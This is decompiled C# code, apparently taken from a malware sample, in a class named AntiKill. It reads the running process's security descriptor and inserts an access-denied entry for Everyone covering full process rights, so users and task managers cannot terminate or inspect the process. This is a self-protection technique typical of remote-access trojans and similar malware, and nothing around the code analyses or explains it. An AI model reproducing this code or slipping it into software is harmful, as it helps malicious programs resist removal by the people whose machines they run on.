// Token: 0x060000AA RID: 170 RVA: 0x0000C168 File Offset: 0x0000A368
public static void SetProcessSecurityDescriptor(IntPtr processHandle, RawSecurityDescriptor dacl)
{
byte[] array = new byte[dacl.BinaryLength - 1 + 1];
dacl.GetBinaryForm(array, 0);
if (!AntiKill.SetKernelObjectSecurity(processHandle, 4, array))
{
throw new Win32Exception();
}
}
// Token: 0x060000AB RID: 171 RVA: 0x0000C1A0 File Offset: 0x0000A3A0
public static void EnableProtection()
{
try
{
IntPtr currentProcess = AntiKill.GetCurrentProcess();
object processSecurityDescriptor = AntiKill.GetProcessSecurityDescriptor(currentProcess);
NewLateBinding.LateCall(NewLateBinding.LateGet(processSecurityDescriptor, null, "DiscretionaryAcl", new object[0], null, null, null), null, "InsertAce", new object[]
{
0,
new CommonAce(AceFlags.None, AceQualifier.AccessDenied, 2035711, new SecurityIdentifier(WellKnownSidType.WorldSid, null), false, null)
}, null, null, null, true);
AntiKill.SetProcessSecurityDescriptor(currentProcess, (RawSecurityDescriptor)processSecurityDescriptor);
}
catch (Exception ex)
{
}
}
// Token: 0x060000A9 RID: 169 RVA: 0x0000C10C File Offset: 0x0000A30C
public static RawSecurityDescriptor GetProcessSecurityDescriptor(IntPtr processHandle)
{
byte[] array = new byte[2];
uint num;
AntiKill.GetKernelObjectSecurity(processHandle, 4, array, 0u, ref num);
array = new byte[num + 1u];
if ((ulong)num < 0UL || (ulong)num > 32767UL)
{
throw new Win32Exception();
}
if (!AntiKill.GetKernelObjectSecurity(processHandle, 4, array, num, ref num))
{
throw new Win32Exception();
}
return(new RawSecurityDescriptor(array, 0));
}
